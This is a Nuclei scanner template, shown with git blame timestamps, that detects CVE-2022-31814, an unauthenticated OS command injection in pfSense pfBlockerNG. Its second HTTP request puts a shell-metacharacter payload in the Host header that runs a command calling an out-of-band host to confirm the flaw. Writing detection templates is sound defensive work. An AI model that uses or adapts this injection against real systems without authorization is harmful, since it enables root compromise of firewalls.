nuclei-templates/http/cves/2022/CVE-2022-31814.yaml

56 lines
1.6 KiB
YAML
Raw Normal View History

2022-09-19 14:12:25 +00:00
id: CVE-2022-31814
2022-09-19 14:12:25 +00:00
info:
name: pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection
2022-09-19 14:12:25 +00:00
author: EvergreenCartoons
severity: critical
description: |
pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
2022-09-19 14:12:25 +00:00
reference:
- https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
- https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
- https://github.com/EvergreenCartoons/SenselessViolence
- https://nvd.nist.gov/vuln/detail/CVE-2022-31814
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html
2022-09-19 14:12:25 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-31814
2023-08-31 11:46:18 +00:00
cwe-id: CWE-78
epss-score: 0.96743
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.99511
2022-09-22 06:47:57 +00:00
metadata:
max-request: 2
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
framework: pfsense
vendor: netgate
product: pfblockerng
2023-07-15 16:29:17 +00:00
tags: packetstorm,cve,cve2022,pfsense,pfblockerng,rce,oast
2022-09-19 14:12:25 +00:00
http:
2022-09-19 14:12:25 +00:00
- raw:
2022-09-23 10:55:47 +00:00
- |+
GET /pfblockerng/www/index.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
2022-09-19 14:12:25 +00:00
- |+
GET /pfblockerng/www/index.php HTTP/1.1
Host: ' *; host {{interactsh-url}}; '
Accept: */*
2022-09-22 06:47:57 +00:00
unsafe: true
2023-07-11 19:49:27 +00:00
req-condition: true
2022-09-22 06:47:57 +00:00
matchers-condition: and
2022-09-19 14:12:25 +00:00
matchers:
2023-07-11 19:49:27 +00:00
- type: dsl
dsl:
- 'contains(body_1, "GIF")'
2022-09-19 14:12:25 +00:00
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"